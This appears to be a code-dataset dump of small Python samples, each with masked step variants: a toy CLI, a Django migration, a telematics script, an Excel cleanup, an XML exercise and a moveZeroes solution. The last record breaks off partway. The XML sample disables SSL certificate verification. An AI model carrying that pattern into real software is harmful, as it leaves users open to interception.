code
stringlengths 13
6.09M
| order_type
stringclasses 2
values | original_example
dict | step_ids
listlengths 1
5
|
|---|---|---|---|
from time import sleep
import sys
def cmdline():
available_commands = ['help', 'quit', 'echo', 'pbar', 'joke']
keepgoing = True
while (keepgoing):
typed = input("Type something. (Type 'help' for options)")
words = [w for w in typed.split(" ")]
command = words[0].lower()
arguments = words[1:]
if (command == ''):
continue
if (command not in available_commands):
print(f"-> {command} is an invalid command. Available commands:", available_commands)
continue
if (command == 'help'):
print('-> Try out the following commands', available_commands)
if (command == 'echo'):
print(f'-> {" ".join(arguments)}')
if (command == 'pbar'):
for i in range(21):
sys.stdout.write('\r')
# the exact output you're looking for:
sys.stdout.write("[%-20s] %d%%" % ('=' * i, 5 * i))
sys.stdout.flush()
sleep(0.25)
print(' done!')
if (command == 'joke'):
import requests
joke = requests.get("https://official-joke-api.appspot.com/random_joke").json()
print(f"-> {joke['setup']}")
input("-> (press enter)")
print(f"-> {joke['punchline']}")
if (command == 'quit'):
keepgoing = False
else:
print("exiting..")
if __name__ == "__main__":
cmdline()
|
normal
|
{
"blob_id": "a028661f9bcaa6dfe5389cb57f31b07d7e981487",
"index": 9890,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef cmdline():\n available_commands = ['help', 'quit', 'echo', 'pbar', 'joke']\n keepgoing = True\n while keepgoing:\n typed = input(\"Type something. (Type 'help' for options)\")\n words = [w for w in typed.split(' ')]\n command = words[0].lower()\n arguments = words[1:]\n if command == '':\n continue\n if command not in available_commands:\n print(f'-> {command} is an invalid command. Available commands:',\n available_commands)\n continue\n if command == 'help':\n print('-> Try out the following commands', available_commands)\n if command == 'echo':\n print(f\"-> {' '.join(arguments)}\")\n if command == 'pbar':\n for i in range(21):\n sys.stdout.write('\\r')\n sys.stdout.write('[%-20s] %d%%' % ('=' * i, 5 * i))\n sys.stdout.flush()\n sleep(0.25)\n print(' done!')\n if command == 'joke':\n import requests\n joke = requests.get(\n 'https://official-joke-api.appspot.com/random_joke').json()\n print(f\"-> {joke['setup']}\")\n input('-> (press enter)')\n print(f\"-> {joke['punchline']}\")\n if command == 'quit':\n keepgoing = False\n else:\n print('exiting..')\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef cmdline():\n available_commands = ['help', 'quit', 'echo', 'pbar', 'joke']\n keepgoing = True\n while keepgoing:\n typed = input(\"Type something. (Type 'help' for options)\")\n words = [w for w in typed.split(' ')]\n command = words[0].lower()\n arguments = words[1:]\n if command == '':\n continue\n if command not in available_commands:\n print(f'-> {command} is an invalid command. Available commands:',\n available_commands)\n continue\n if command == 'help':\n print('-> Try out the following commands', available_commands)\n if command == 'echo':\n print(f\"-> {' '.join(arguments)}\")\n if command == 'pbar':\n for i in range(21):\n sys.stdout.write('\\r')\n sys.stdout.write('[%-20s] %d%%' % ('=' * i, 5 * i))\n sys.stdout.flush()\n sleep(0.25)\n print(' done!')\n if command == 'joke':\n import requests\n joke = requests.get(\n 'https://official-joke-api.appspot.com/random_joke').json()\n print(f\"-> {joke['setup']}\")\n input('-> (press enter)')\n print(f\"-> {joke['punchline']}\")\n if command == 'quit':\n keepgoing = False\n else:\n print('exiting..')\n\n\nif __name__ == '__main__':\n cmdline()\n",
"step-4": "from time import sleep\nimport sys\n\n\ndef cmdline():\n available_commands = ['help', 'quit', 'echo', 'pbar', 'joke']\n keepgoing = True\n while keepgoing:\n typed = input(\"Type something. (Type 'help' for options)\")\n words = [w for w in typed.split(' ')]\n command = words[0].lower()\n arguments = words[1:]\n if command == '':\n continue\n if command not in available_commands:\n print(f'-> {command} is an invalid command. Available commands:',\n available_commands)\n continue\n if command == 'help':\n print('-> Try out the following commands', available_commands)\n if command == 'echo':\n print(f\"-> {' '.join(arguments)}\")\n if command == 'pbar':\n for i in range(21):\n sys.stdout.write('\\r')\n sys.stdout.write('[%-20s] %d%%' % ('=' * i, 5 * i))\n sys.stdout.flush()\n sleep(0.25)\n print(' done!')\n if command == 'joke':\n import requests\n joke = requests.get(\n 'https://official-joke-api.appspot.com/random_joke').json()\n print(f\"-> {joke['setup']}\")\n input('-> (press enter)')\n print(f\"-> {joke['punchline']}\")\n if command == 'quit':\n keepgoing = False\n else:\n print('exiting..')\n\n\nif __name__ == '__main__':\n cmdline()\n",
"step-5": "from time import sleep\nimport sys\n\ndef cmdline():\n available_commands = ['help', 'quit', 'echo', 'pbar', 'joke']\n keepgoing = True\n while (keepgoing):\n typed = input(\"Type something. (Type 'help' for options)\")\n words = [w for w in typed.split(\" \")]\n command = words[0].lower()\n arguments = words[1:]\n\n if (command == ''):\n continue\n if (command not in available_commands):\n print(f\"-> {command} is an invalid command. Available commands:\", available_commands)\n continue\n\n if (command == 'help'):\n print('-> Try out the following commands', available_commands)\n if (command == 'echo'):\n print(f'-> {\" \".join(arguments)}')\n if (command == 'pbar'):\n for i in range(21):\n sys.stdout.write('\\r')\n # the exact output you're looking for:\n sys.stdout.write(\"[%-20s] %d%%\" % ('=' * i, 5 * i))\n sys.stdout.flush()\n sleep(0.25)\n print(' done!')\n\n if (command == 'joke'):\n import requests\n joke = requests.get(\"https://official-joke-api.appspot.com/random_joke\").json()\n print(f\"-> {joke['setup']}\")\n input(\"-> (press enter)\")\n print(f\"-> {joke['punchline']}\")\n\n if (command == 'quit'):\n keepgoing = False\n\n\n else:\n print(\"exiting..\")\n\n\nif __name__ == \"__main__\":\n cmdline()\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Migration(migrations.Migration):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Migration(migrations.Migration):
dependencies = [('orders', '0001_initial')]
operations = [migrations.RenameField(model_name='orderproduct',
old_name='products', new_name='product')]
<|reserved_special_token_1|>
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [('orders', '0001_initial')]
operations = [migrations.RenameField(model_name='orderproduct',
old_name='products', new_name='product')]
<|reserved_special_token_1|>
# Generated by Django 3.1 on 2020-09-09 15:58
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('orders', '0001_initial'),
]
operations = [
migrations.RenameField(
model_name='orderproduct',
old_name='products',
new_name='product',
),
]
|
flexible
|
{
"blob_id": "0e73153d004137d374637abf70faffabf0bab1fb",
"index": 9762,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('orders', '0001_initial')]\n operations = [migrations.RenameField(model_name='orderproduct',\n old_name='products', new_name='product')]\n",
"step-4": "from django.db import migrations\n\n\nclass Migration(migrations.Migration):\n dependencies = [('orders', '0001_initial')]\n operations = [migrations.RenameField(model_name='orderproduct',\n old_name='products', new_name='product')]\n",
"step-5": "# Generated by Django 3.1 on 2020-09-09 15:58\n\nfrom django.db import migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('orders', '0001_initial'),\n ]\n\n operations = [\n migrations.RenameField(\n model_name='orderproduct',\n old_name='products',\n new_name='product',\n ),\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
from pylab import *
import pandas as pd
from matplotlib import pyplot
import pylab
from mpl_toolkits.mplot3d import Axes3D
from threading import Thread
from threading import Semaphore
from threading import Lock
from Queue import Queue
sam = Semaphore(1)
lck = Lock()
q=Queue(10)
def myFunc(z):
#if z%2==0 and z>1:
max_dist=[]
cumm_dist=[]
endpt_dist=[]
passible=True
for i in range(1,201):
try:
vecs=pd.read_csv("/Users/vmac/Downloads/drivers/"+str(z)+"/"+str(i)+".csv")
#print "proceed"
#ax.plot(vecs['x'], vecs['y'], color=colors[i%6], lw=1)
max_dist.append(0.0)
cumm_dist.append(0.0)
endpt_dist.append(sqrt(vecs['y'][len(vecs)-1]*vecs['y'][len(vecs)-1]+vecs['x'][len(vecs)-1]*vecs['x'][len(vecs)-1]))
for j in range(0,len(vecs)):
local_dist=sqrt(vecs['y'][j]*vecs['y'][j]+vecs['x'][j]*vecs['x'][j])
if j==0:
incr_dist=sqrt(vecs['y'][j]*vecs['y'][j]+vecs['x'][j]*vecs['x'][j])
else:
incr_dist=sqrt((vecs['y'][j]-vecs['y'][j-1])*(vecs['y'][j]-vecs['y'][j-1])+(vecs['x'][j]-vecs['x'][j-1])*(vecs['x'][j]-vecs['x'][j-1]))
if max_dist[i-1]<local_dist:
max_dist[i-1]=local_dist
cumm_dist[i-1]+=incr_dist
except Exception, e:
passible=False
print e
if passible==True:
#prob_vals = hist(max_dist, bins=10,cumulative=True,normed=True)
mean_max_dist=mean(max_dist)
std_max_dist=std(max_dist)
#print std_max_dist
max_dist=(max_dist-mean_max_dist)/std_max_dist
mean_cumm_dist=mean(cumm_dist)
std_cumm_dist=std(cumm_dist)
cumm_dist=(cumm_dist-mean_cumm_dist)/std_cumm_dist
mean_endpt_dist=mean(endpt_dist)
std_endpt_dist=std(endpt_dist)
endpt_dist=(endpt_dist-mean_endpt_dist)/std_endpt_dist
the_norms=np.sqrt(np.square(max_dist)+np.square(cumm_dist)+np.square(endpt_dist))
#mean_norms=mean(the_norms)
#median_norms=median(the_norms)
#print mean(the_norms),median(the_norms)
#fig = plt.figure()
#ax = Axes3D(fig)
#plt.hist(the_norms)
#ax.scatter(max_dist, cumm_dist, endpt_dist)
#plt.show()
prob_vals=hist(the_norms, bins=10, cumulative=True,normed=True)
#print max_dist
#exit(0)
#print prob_vals[0], prob_vals[1]
#approach 1: calculate max distance from origin for each path, use histogram to check for anomalies gap
#approach 2: calculate max_dist, cumulative dist, and endpoint distance,make z score,
# use histogram to check for anomalies gap
threshold1=0
threshold2=0
for i in range(0,len(prob_vals[0])-1):
#print prob_vals[0][i+1]-prob_vals[0][i]
if prob_vals[0][i+1]-prob_vals[0][i]< 0.1:
if threshold1==0:
threshold1=prob_vals[1][i+1]
threshold2=prob_vals[1][i+1]
else:
threshold2=prob_vals[1][i+1]
if z%1==0:
bin_classes=[]
for i in range(0,len(max_dist)):
if the_norms[i]>=threshold1 and the_norms[i]<=threshold2:
bin_classes.append({'driver_trip':str(z)+"_"+str(i+1),'prob':0})
else:
bin_classes.append({'driver_trip':str(z)+"_"+str(i+1),'prob':1})
#print bin_classes
#print "success?"
outpt=pd.DataFrame(data=bin_classes)
#print "success2 "
if z==1:
outpt.to_csv(path_or_buf="/Users/vmac/PycharmProjects/kaggle-axa-driver-telematics/sampleOutz2.csv", index=False)
else:
q.put(outpt)
#print "queue size ",q.qsize()
#with open("/Users/vmac/PycharmProjects/kaggle-axa-driver-telematics/sampleOutz2.csv",'a') as f:
#outpt.to_csv(f,header=False, index=False)
#f.close()
print "success ",z
#sam.release()
def worker():
while True:
item = q.get()
item.to_csv(f, header=False, index=False)
q.task_done()
#print "queue size ",q.qsize()
bin_classes=[]
f=[]
for z in range(2762,3613):#up to 3613
#print "iteration ",z
if z == 168:
myFunc(z)
f = open("/Users/vmac/PycharmProjects/kaggle-axa-driver-telematics/sampleOutz2.csv",'a')
t=Thread(target=worker)
t.daemon=True
t.start()
else:
myFunc(z)
#sam.acquire()
#t=Thread(target=myFunc,args=(z,))
#t.start()
|
normal
|
{
"blob_id": "33c0efb47e3253442b6a808c7ebffac275c19321",
"index": 7763,
"step-1": "from pylab import *\nimport pandas as pd\nfrom matplotlib import pyplot\nimport pylab\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom threading import Thread\nfrom threading import Semaphore\nfrom threading import Lock\nfrom Queue import Queue\nsam = Semaphore(1)\n\nlck = Lock()\nq=Queue(10)\n\ndef myFunc(z):\n #if z%2==0 and z>1:\n max_dist=[]\n cumm_dist=[]\n endpt_dist=[]\n passible=True\n for i in range(1,201):\n try:\n vecs=pd.read_csv(\"/Users/vmac/Downloads/drivers/\"+str(z)+\"/\"+str(i)+\".csv\")\n #print \"proceed\"\n #ax.plot(vecs['x'], vecs['y'], color=colors[i%6], lw=1)\n max_dist.append(0.0)\n cumm_dist.append(0.0)\n endpt_dist.append(sqrt(vecs['y'][len(vecs)-1]*vecs['y'][len(vecs)-1]+vecs['x'][len(vecs)-1]*vecs['x'][len(vecs)-1]))\n for j in range(0,len(vecs)):\n local_dist=sqrt(vecs['y'][j]*vecs['y'][j]+vecs['x'][j]*vecs['x'][j])\n if j==0:\n incr_dist=sqrt(vecs['y'][j]*vecs['y'][j]+vecs['x'][j]*vecs['x'][j])\n else:\n incr_dist=sqrt((vecs['y'][j]-vecs['y'][j-1])*(vecs['y'][j]-vecs['y'][j-1])+(vecs['x'][j]-vecs['x'][j-1])*(vecs['x'][j]-vecs['x'][j-1]))\n if max_dist[i-1]<local_dist:\n max_dist[i-1]=local_dist\n cumm_dist[i-1]+=incr_dist\n except Exception, e:\n passible=False\n print e\n\n if passible==True:\n #prob_vals = hist(max_dist, bins=10,cumulative=True,normed=True)\n mean_max_dist=mean(max_dist)\n std_max_dist=std(max_dist)\n #print std_max_dist\n max_dist=(max_dist-mean_max_dist)/std_max_dist\n mean_cumm_dist=mean(cumm_dist)\n std_cumm_dist=std(cumm_dist)\n cumm_dist=(cumm_dist-mean_cumm_dist)/std_cumm_dist\n mean_endpt_dist=mean(endpt_dist)\n std_endpt_dist=std(endpt_dist)\n endpt_dist=(endpt_dist-mean_endpt_dist)/std_endpt_dist\n\n the_norms=np.sqrt(np.square(max_dist)+np.square(cumm_dist)+np.square(endpt_dist))\n #mean_norms=mean(the_norms)\n #median_norms=median(the_norms)\n #print mean(the_norms),median(the_norms)\n #fig = plt.figure()\n #ax = Axes3D(fig)\n #plt.hist(the_norms)\n #ax.scatter(max_dist, cumm_dist, endpt_dist)\n 
#plt.show()\n prob_vals=hist(the_norms, bins=10, cumulative=True,normed=True)\n\n #print max_dist\n #exit(0)\n #print prob_vals[0], prob_vals[1]\n\n #approach 1: calculate max distance from origin for each path, use histogram to check for anomalies gap\n #approach 2: calculate max_dist, cumulative dist, and endpoint distance,make z score,\n # use histogram to check for anomalies gap\n threshold1=0\n threshold2=0\n for i in range(0,len(prob_vals[0])-1):\n #print prob_vals[0][i+1]-prob_vals[0][i]\n if prob_vals[0][i+1]-prob_vals[0][i]< 0.1:\n if threshold1==0:\n threshold1=prob_vals[1][i+1]\n threshold2=prob_vals[1][i+1]\n else:\n threshold2=prob_vals[1][i+1]\n\n if z%1==0:\n bin_classes=[]\n for i in range(0,len(max_dist)):\n if the_norms[i]>=threshold1 and the_norms[i]<=threshold2:\n bin_classes.append({'driver_trip':str(z)+\"_\"+str(i+1),'prob':0})\n else:\n bin_classes.append({'driver_trip':str(z)+\"_\"+str(i+1),'prob':1})\n #print bin_classes\n #print \"success?\"\n outpt=pd.DataFrame(data=bin_classes)\n #print \"success2 \"\n if z==1:\n outpt.to_csv(path_or_buf=\"/Users/vmac/PycharmProjects/kaggle-axa-driver-telematics/sampleOutz2.csv\", index=False)\n else:\n q.put(outpt)\n #print \"queue size \",q.qsize()\n #with open(\"/Users/vmac/PycharmProjects/kaggle-axa-driver-telematics/sampleOutz2.csv\",'a') as f:\n #outpt.to_csv(f,header=False, index=False)\n #f.close()\n\n print \"success \",z\n #sam.release()\n\ndef worker():\n while True:\n item = q.get()\n item.to_csv(f, header=False, index=False)\n q.task_done()\n #print \"queue size \",q.qsize()\n\nbin_classes=[]\nf=[]\n\nfor z in range(2762,3613):#up to 3613\n #print \"iteration \",z\n if z == 168:\n myFunc(z)\n f = open(\"/Users/vmac/PycharmProjects/kaggle-axa-driver-telematics/sampleOutz2.csv\",'a')\n t=Thread(target=worker)\n t.daemon=True\n t.start()\n else:\n myFunc(z)\n #sam.acquire()\n #t=Thread(target=myFunc,args=(z,))\n #t.start()",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
# -*- coding: utf-8 -*-
import os
import time
import pandas as pd
file_dir = os.getcwd() # 获取当前工作目录
file_list_all = os.listdir(file_dir) # 获取目录下的所有文件名
file_list_excel = [item for item in file_list_all if ('.xlsx' in item) or ('.xls' in item)] # 清洗非excel文件
new_list = [] # 空列表用于存放下面各个清洗后的表格
for file in file_list_excel:
'''遍历所有excel文件,删除空行'''
file_path = os.path.join(file_dir, file) # 连接而成当前文件的完整路径
df = pd.read_excel(file_path) # 读取当前excel文件
data = pd.DataFrame(df.iloc[:, :]).dropna(axis=0, how='any') # 对空行进行删除
new_list.append(data) # 删除空行后存入列表
df_all = pd.concat(new_list) # 将所有删除空行的表格进行合并
df_all.to_excel('new_file.xlsx', index=False) # 将合并后的数据存到文件中
print('Ok, 3秒后退出。')
time.sleep(3)
|
normal
|
{
"blob_id": "ea646068d48a9a4b5a578a5fb1399d83a4812b02",
"index": 1134,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor file in file_list_excel:\n \"\"\"遍历所有excel文件,删除空行\"\"\"\n file_path = os.path.join(file_dir, file)\n df = pd.read_excel(file_path)\n data = pd.DataFrame(df.iloc[:, :]).dropna(axis=0, how='any')\n new_list.append(data)\n<mask token>\ndf_all.to_excel('new_file.xlsx', index=False)\nprint('Ok, 3秒后退出。')\ntime.sleep(3)\n",
"step-3": "<mask token>\nfile_dir = os.getcwd()\nfile_list_all = os.listdir(file_dir)\nfile_list_excel = [item for item in file_list_all if '.xlsx' in item or \n '.xls' in item]\nnew_list = []\nfor file in file_list_excel:\n \"\"\"遍历所有excel文件,删除空行\"\"\"\n file_path = os.path.join(file_dir, file)\n df = pd.read_excel(file_path)\n data = pd.DataFrame(df.iloc[:, :]).dropna(axis=0, how='any')\n new_list.append(data)\ndf_all = pd.concat(new_list)\ndf_all.to_excel('new_file.xlsx', index=False)\nprint('Ok, 3秒后退出。')\ntime.sleep(3)\n",
"step-4": "import os\nimport time\nimport pandas as pd\nfile_dir = os.getcwd()\nfile_list_all = os.listdir(file_dir)\nfile_list_excel = [item for item in file_list_all if '.xlsx' in item or \n '.xls' in item]\nnew_list = []\nfor file in file_list_excel:\n \"\"\"遍历所有excel文件,删除空行\"\"\"\n file_path = os.path.join(file_dir, file)\n df = pd.read_excel(file_path)\n data = pd.DataFrame(df.iloc[:, :]).dropna(axis=0, how='any')\n new_list.append(data)\ndf_all = pd.concat(new_list)\ndf_all.to_excel('new_file.xlsx', index=False)\nprint('Ok, 3秒后退出。')\ntime.sleep(3)\n",
"step-5": "# -*- coding: utf-8 -*-\nimport os\nimport time\nimport pandas as pd\n\nfile_dir = os.getcwd() # 获取当前工作目录\nfile_list_all = os.listdir(file_dir) # 获取目录下的所有文件名\nfile_list_excel = [item for item in file_list_all if ('.xlsx' in item) or ('.xls' in item)] # 清洗非excel文件\n\nnew_list = [] # 空列表用于存放下面各个清洗后的表格\nfor file in file_list_excel:\n '''遍历所有excel文件,删除空行'''\n file_path = os.path.join(file_dir, file) # 连接而成当前文件的完整路径\n df = pd.read_excel(file_path) # 读取当前excel文件\n data = pd.DataFrame(df.iloc[:, :]).dropna(axis=0, how='any') # 对空行进行删除\n new_list.append(data) # 删除空行后存入列表\n\ndf_all = pd.concat(new_list) # 将所有删除空行的表格进行合并\ndf_all.to_excel('new_file.xlsx', index=False) # 将合并后的数据存到文件中\n\nprint('Ok, 3秒后退出。')\ntime.sleep(3)\n\n\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
if len(url) < 1:
url = 'http://py4e-data.dr-chuck.net/comments_70857.xml'
<|reserved_special_token_0|>
print(len(xml))
<|reserved_special_token_0|>
print('Comment count:', len(lst))
<|reserved_special_token_0|>
for item in lst:
x = int(item.find('count').text)
tot = tot + x
print(tot)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
url = input('Enter a URL: ')
if len(url) < 1:
url = 'http://py4e-data.dr-chuck.net/comments_70857.xml'
xml = urlopen(url, context=ctx).read()
print(len(xml))
stuff = ET.fromstring(xml)
lst = stuff.findall('comments/comment')
print('Comment count:', len(lst))
tot = 0
for item in lst:
x = int(item.find('count').text)
tot = tot + x
print(tot)
<|reserved_special_token_1|>
import urllib.request, urllib.parse, urllib.error
from urllib.request import urlopen
import xml.etree.ElementTree as ET
import ssl
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
url = input('Enter a URL: ')
if len(url) < 1:
url = 'http://py4e-data.dr-chuck.net/comments_70857.xml'
xml = urlopen(url, context=ctx).read()
print(len(xml))
stuff = ET.fromstring(xml)
lst = stuff.findall('comments/comment')
print('Comment count:', len(lst))
tot = 0
for item in lst:
x = int(item.find('count').text)
tot = tot + x
print(tot)
<|reserved_special_token_1|>
import urllib.request, urllib.parse, urllib.error
from urllib.request import urlopen
import xml.etree.ElementTree as ET
import ssl
# # Ignore SSL certificate errors
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
url = input('Enter a URL: ')
# if len(url) < 1 : url = 'http://py4e-data.dr-chuck.net/comments_42.xml'
if len(url) < 1 : url = 'http://py4e-data.dr-chuck.net/comments_70857.xml'
# uh = urllib.request.urlopen(url)
# data = uh.read()
# print('Retrieved', len(data), 'characters')
# print(data.decode())
xml = urlopen(url, context=ctx).read()
print(len(xml))
stuff = ET.fromstring(xml)
lst = stuff.findall('comments/comment')
print('Comment count:', len(lst))
tot = 0
# counts = stuff.findall('.//count')
# print(counts)
for item in lst:
# print('Name', item.find('name').text)
# print('Count', item.find('count').text)
x = int(item.find('count').text)
tot = tot + x
print(tot)
|
flexible
|
{
"blob_id": "3b8c4f19e28e54e651862ec9b88b091c9faff02b",
"index": 9525,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nif len(url) < 1:\n url = 'http://py4e-data.dr-chuck.net/comments_70857.xml'\n<mask token>\nprint(len(xml))\n<mask token>\nprint('Comment count:', len(lst))\n<mask token>\nfor item in lst:\n x = int(item.find('count').text)\n tot = tot + x\nprint(tot)\n",
"step-3": "<mask token>\nctx = ssl.create_default_context()\nctx.check_hostname = False\nctx.verify_mode = ssl.CERT_NONE\nurl = input('Enter a URL: ')\nif len(url) < 1:\n url = 'http://py4e-data.dr-chuck.net/comments_70857.xml'\nxml = urlopen(url, context=ctx).read()\nprint(len(xml))\nstuff = ET.fromstring(xml)\nlst = stuff.findall('comments/comment')\nprint('Comment count:', len(lst))\ntot = 0\nfor item in lst:\n x = int(item.find('count').text)\n tot = tot + x\nprint(tot)\n",
"step-4": "import urllib.request, urllib.parse, urllib.error\nfrom urllib.request import urlopen\nimport xml.etree.ElementTree as ET\nimport ssl\nctx = ssl.create_default_context()\nctx.check_hostname = False\nctx.verify_mode = ssl.CERT_NONE\nurl = input('Enter a URL: ')\nif len(url) < 1:\n url = 'http://py4e-data.dr-chuck.net/comments_70857.xml'\nxml = urlopen(url, context=ctx).read()\nprint(len(xml))\nstuff = ET.fromstring(xml)\nlst = stuff.findall('comments/comment')\nprint('Comment count:', len(lst))\ntot = 0\nfor item in lst:\n x = int(item.find('count').text)\n tot = tot + x\nprint(tot)\n",
"step-5": "import urllib.request, urllib.parse, urllib.error\nfrom urllib.request import urlopen\nimport xml.etree.ElementTree as ET\nimport ssl \n\n# # Ignore SSL certificate errors\nctx = ssl.create_default_context()\nctx.check_hostname = False\nctx.verify_mode = ssl.CERT_NONE\n\nurl = input('Enter a URL: ')\n# if len(url) < 1 : url = 'http://py4e-data.dr-chuck.net/comments_42.xml'\nif len(url) < 1 : url = 'http://py4e-data.dr-chuck.net/comments_70857.xml'\n# uh = urllib.request.urlopen(url)\n# data = uh.read()\n# print('Retrieved', len(data), 'characters')\n # print(data.decode())\nxml = urlopen(url, context=ctx).read()\nprint(len(xml))\n\nstuff = ET.fromstring(xml)\nlst = stuff.findall('comments/comment')\nprint('Comment count:', len(lst))\n\ntot = 0\n# counts = stuff.findall('.//count')\n# print(counts)\nfor item in lst:\n # print('Name', item.find('name').text)\n # print('Count', item.find('count').text)\n x = int(item.find('count').text)\n tot = tot + x\n \nprint(tot)\n\n\n\n\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
class Solution(object):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Solution(object):
def moveZeroes(self, nums):
"""
:type nums: List[int]
:rtype: None Do not return anything, modify nums in-place instead.
"""
i = 0
j = 1
n = len(nums)
while j < n and i < j:
if nums[i] == 0 and nums[j] != 0:
temp = nums[i]
nums[i] = nums[j]
nums[j] = temp
i += 1
j += 1
continue
if nums[i] != 0:
i += 1
continue
if nums[i] == 0 and nums[j] == 0:
j += 1
continue
return nums
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Solution(object):
def moveZeroes(self, nums):
"""
:type nums: List[int]
:rtype: None Do not return anything, modify nums in-place instead.
"""
i = 0
j = 1
n = len(nums)
while j < n and i < j:
if nums[i] == 0 and nums[j] != 0:
temp = nums[i]
nums[i] = nums[j]
nums[j] = temp
i += 1
j += 1
continue
if nums[i] != 0:
i += 1
continue
if nums[i] == 0 and nums[j] == 0:
j += 1
continue
return nums
<|reserved_special_token_0|>
print(s.moveZeroes(nums))
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Solution(object):
def moveZeroes(self, nums):
"""
:type nums: List[int]
:rtype: None Do not return anything, modify nums in-place instead.
"""
i = 0
j = 1
n = len(nums)
while j < n and i < j:
if nums[i] == 0 and nums[j] != 0:
temp = nums[i]
nums[i] = nums[j]
nums[j] = temp
i += 1
j += 1
continue
if nums[i] != 0:
i += 1
continue
if nums[i] == 0 and nums[j] == 0:
j += 1
continue
return nums
nums = [-959151711, 623836953, 209446690, -1950418142, 1339915067, -
733626417, 481171539, -2125997010, -1225423476, 1462109565, 147434687,
-1800073781, -1431212205, -450443973, 50097298, 753533734, -747189404,
-2070885638, 0, -1484353894, -340296594, -2133744570, 619639811, -
1626162038, 669689561, 0, 112220218, 502447212, -787793179, 0, -
726846372, -1611013491, 204107194, 1605165582, -566891128, 2082852116,
0, 532995238, -1502590712, 0, 2136989777, -2031153343, 371398938, -
1907397429, 342796391, 609166045, -2007448660, -1096076344, -323570318,
0, -2082980371, 2129956379, -243553361, -1549960929, 1502383415, 0, -
1394618779, 694799815, 78595689, -1439173023, -1416578800, 685225786, -
333502212, -1181308536, -380569313, 772035354, 0, -915266376, 663709718,
1443496021, -777017729, -883300731, -387828385, 1907473488, -725483724,
-972961871, -1255712537, 383120918, 1383877998, 1722751914, 0, -
1156050682, 1952527902, -560244497, 1304305692, 1173974542, -1313227247,
-201476579, -298899493, -1828496581, -1724396350, 1933643204,
1531804925, 1728655262, -955565449, 0, -69843702, -461760848, 268336768,
1446130876]
s = Solution()
print(s.moveZeroes(nums))
<|reserved_special_token_1|>
"""
MAIN IDEA --> Keep 2 pointers. i points to current 0 element and j searches for first non zero element which comes after i.
As soon as we get a j, we swap i and j. So index i now becomes non zero. Now move i to next index i.e i+1 and now check if i
is zero or non zero. If i is still zero, then again search for 1st non zero element represented by j and swap again.
If i is now non-zero then no need to swap we already have a non zero in the beginning of array, so we just move the pointer i forward
"""
class Solution(object):
def moveZeroes(self, nums):
"""
:type nums: List[int]
:rtype: None Do not return anything, modify nums in-place instead.
"""
i = 0
j = 1
n = len(nums)
while j < n and i < j: # j searches for the 1st non zero element after pointer i
if nums[i] == 0 and nums[j] != 0: # If element at i is zero and j != 0, swap them
temp = nums[i]
nums[i] = nums[j]
nums[j] = temp
i += 1
j += 1
continue
if nums[i] != 0: # If i is not zero, then just increment both i and j
i += 1
#j += 1
continue
if nums[i] == 0 and nums[j] == 0:
j += 1
continue
return nums
nums = [-959151711,623836953,209446690,-1950418142,1339915067,-733626417,481171539,-2125997010,-1225423476,1462109565,147434687,-1800073781,-1431212205,-450443973,50097298,753533734,-747189404,-2070885638,0,-1484353894,-340296594,-2133744570,619639811,-1626162038,669689561,0,112220218,502447212,-787793179,0,-726846372,-1611013491,204107194,1605165582,-566891128,2082852116,0,532995238,-1502590712,0,2136989777,-2031153343,371398938,-1907397429,342796391,609166045,-2007448660,-1096076344,-323570318,0,-2082980371,2129956379,-243553361,-1549960929,1502383415,0,-1394618779,694799815,78595689,-1439173023,-1416578800,685225786,-333502212,-1181308536,-380569313,772035354,0,-915266376,663709718,1443496021,-777017729,-883300731,-387828385,1907473488,-725483724,-972961871,-1255712537,383120918,1383877998,1722751914,0,-1156050682,1952527902,-560244497,1304305692,1173974542,-1313227247,-201476579,-298899493,-1828496581,-1724396350,1933643204,1531804925,1728655262,-955565449,0,-69843702,-461760848,268336768,1446130876]
s = Solution()
print(s.moveZeroes(nums))
|
flexible
|
{
"blob_id": "8855747f58b48bedc362930662e147b1fc4ebd63",
"index": 4182,
"step-1": "<mask token>\n\n\nclass Solution(object):\n <mask token>\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Solution(object):\n\n def moveZeroes(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: None Do not return anything, modify nums in-place instead.\n \"\"\"\n i = 0\n j = 1\n n = len(nums)\n while j < n and i < j:\n if nums[i] == 0 and nums[j] != 0:\n temp = nums[i]\n nums[i] = nums[j]\n nums[j] = temp\n i += 1\n j += 1\n continue\n if nums[i] != 0:\n i += 1\n continue\n if nums[i] == 0 and nums[j] == 0:\n j += 1\n continue\n return nums\n\n\n<mask token>\n",
